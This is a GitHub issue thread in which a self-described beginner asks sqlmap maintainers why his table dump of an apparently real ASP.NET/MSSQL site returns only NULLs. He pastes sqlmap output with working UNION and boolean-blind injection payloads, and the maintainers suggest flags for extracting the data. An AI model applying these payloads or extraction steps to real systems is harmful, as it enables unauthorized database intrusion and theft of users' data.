### ISSUE TITLE
all data return null 

### ISSUE THREAD

**Issue by G0st-ly** [sqlmapproject/sqlmap#2837]
hello 
I have a problem

all data Receive it's NULL 

i try --hex 

how receive char data 

![2017-12-20_4-38-19](https://user-images.githubusercontent.com/25392388/34188663-3b3a4964-e540-11e7-8d75-f4cd64506dc5.jpg)
![2017-12-20_4-39-13](https://user-images.githubusercontent.com/25392388/34188676-48cc0900-e540-11e7-99c3-42fb47fb41ce.jpg)

**Comment by Ekultek** [comment]
Lmao

Sorry but I’ve never seen this shit in my life

**Comment by stamparm** [comment]
Which DBMS and which technique?

**Comment by G0st-ly** [comment]
I redownload sqlmap-dev

but now same error
how i can receive char and string

please write the comand

i writed

sqlmap -u Site -D Database -T table--dump --hex

please correct that

**Comment by stamparm** [comment]
@G0st-ly still waiting for answers to questions from up above. Don't know what to correct if you don't give me any usable info

**Comment by G0st-ly** [comment]
i am only this 
sqlmap -u Site -D Database -T table--dump --hex

Because I'm still a beginner

**Comment by stamparm** [comment]
What DBMS and what technique? sqlmap says it all in console output you get

**Comment by G0st-ly** [comment]
resuming back-end DBMS 'microsoft sql server' 
[07:34:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id_ads (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id_ads=20 AND 2110=2110

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id_ads=-2261 UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(98)+CHAR(122)+CHAR(113)+CHAR(88)+CHAR(121)+CHAR(81)+CHAR(120)+CHAR(119)+CHAR(108)+CHAR(65)+CHAR(110)+CHAR(115)+CHAR(74)+CHAR(70)+CHAR(88)+CHAR(85)+CHAR(89)+CHAR(98)+CHAR(115)+CHAR(73)+CHAR(82)+CHAR(104)+CHAR(122)+CHAR(90)+CHAR(83)+CHAR(121)+CHAR(88)+CHAR(67)+CHAR(114)+CHAR(98)+CHAR(113)+CHAR(78)+CHAR(113)+CHAR(117)+CHAR(86)+CHAR(120)+CHAR(103)+CHAR(76)+CHAR(122)+CHAR(66)+CHAR(114)+CHAR(82)+CHAR(90)+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(98)+CHAR(113)-- VAho
---
[07:34:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2014
[07:34:41] [INFO] fetching columns for table 'users' in database 'database55'
[07:34:42] [WARNING] reflective value(s) found and filtering out

**Comment by fredhagedorn** [comment]
What if there is **really** no data to retrieve?

**Comment by stamparm** [comment]
@G0st-ly and what are you getting without `--hex`? I guess nothing

**Comment by stamparm** [comment]
One more thing. I wonder do you get `there was a problem decoding...` with that patch I've pushed?

**Comment by G0st-ly** [comment]
without --hex all data is null 
 with that patch error in the picture

how retrieve string and char data ?

**Comment by stamparm** [comment]
Basically, in your case there is no data to be retrieved. You have to debug on your side why is there no data. I'll deal with the all `NULL` data. Also, people tend to forget to mention if there was any protection (WAF/IDS/IPS) detected in the first place

**Comment by stamparm** [comment]
Also, you haven't gave a full console output where the `NULL `occurs. Whether in table dump or column retrieval phase. If in table dump please use `--pivot-column` (as I can see that you are dealing with MsSQL)

**Comment by G0st-ly** [comment]
[14:56:20] [WARNING] reflective value(s) found and filtering out
how retrieve string and char data ?
Because the data has the Arabic language

tying --hex show the warning [14:57:32] [WARNING] there was a problem decoding value 

There is no kind of protection from what you mentioned

**Comment by stamparm** [comment]
1) Do you still get all NULLs?
2) Have you tried `--pivot-column`?
3) Have you tried to look into the traffic (e.g. with `-t traffic.txt`) to see the content of retrieved data when using `--hex`. You have an UNION SQLi. That should be fairly easy to see what is going on in the traffic itself

**Comment by G0st-ly** [comment]
1. yes all data NULLs
2. yes but same error 
3. ET /xxxxxxxxxxx ads=20 HTTP/1.1

Host: ixxxxxxxxxxxxx

Cache-control: no-cache

Accept-encoding: gzip,deflate

Accept: */*

User-agent: sqlmap/1.1.12.28#dev (http://sqlmap.org)

Connection: close


HTTP response [#1] (200 OK):

Content-length: 9765

X-aspnet-version: 2.0.50727

Content-encoding: gzip

Vary: Accept-Encoding

Uri: xxxxxxxxxxxxxxxxxxxxxxxxxxxxx=20

Server: Microsoft-IIS/8.5

Connection: close

Cache-control: private

Date: Mon, 25 Dec 2017 00:38:48 GMT

X-powered-by: ASP.NET

Content-type: text/html; charset=utf-8

X-powered-by-plesk: PleskWin

**Comment by stamparm** [comment]
It is really hard to support you. I've asked you to take a look into the whole traffic and you are returning HTTP headers. Please try to debug the content of response (you have an UNION SQLi which should be more than helpful) and if you find some "inconsistencies" report back. Otherwise I give up on this issue

**Comment by G0st-ly** [comment]
thank bro 
I will try
